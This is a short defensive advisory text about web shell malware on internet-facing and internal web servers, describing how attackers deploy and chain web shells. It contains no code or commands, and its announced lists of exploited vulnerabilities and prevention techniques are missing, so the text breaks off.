For computer network exploitation, cyber attackers have boosted their usage of web shell malware. Web shell malware is malicious software that a hacker installs on a victim’s web server. It can be used to run any system command that is frequently transmitted over HTTP or HTTPS. DoD components are vulnerable to web shell attacks. Adding or changing a file in an existing online application is a common way for attackers to establish web shells. Web shells provide attackers with persistent access to a compromised network using communication channels disguised to blend in with legitimate traffic. Web shell malware is a long-standing, pervasive threat that continues to evade many security tools. Cyber actors deploy web shells by exploiting web application vulnerabilities or uploading to otherwise compromised systems. Web shells can serve as persistent backdoors or as relay nodes to route attacker commands to other systems. Attackers frequently chain together web shells on multiple compromised systems to route traffic across networks, such as from internet-facing systems to internal networks. It is a common misperception that only internet-facing systems are targeted for web shells. Attackers frequently deploy web shells on non-internet-facing web servers, such as internal content management systems or network device management interfaces. Internal web applications are often more susceptible to compromise due to lagging patch management or permissive security requirements. Though “web shells” is most commonly linked with malware, it can also refer to legitimately utilized web-based system management solutions. These benign web shells, while not the focus of this advice, may constitute a risk to businesses since flaws in these tools can lead to system compromise. Using enterprise authentication techniques, secure communication routes, and security hardening, administrators should employ system management software.
Below are the commonly exploited vulnerabilities used to install web shell malware:
Preventing web shells should be on top of the priority on both internet-facing and internal web servers. Prevention techniques include.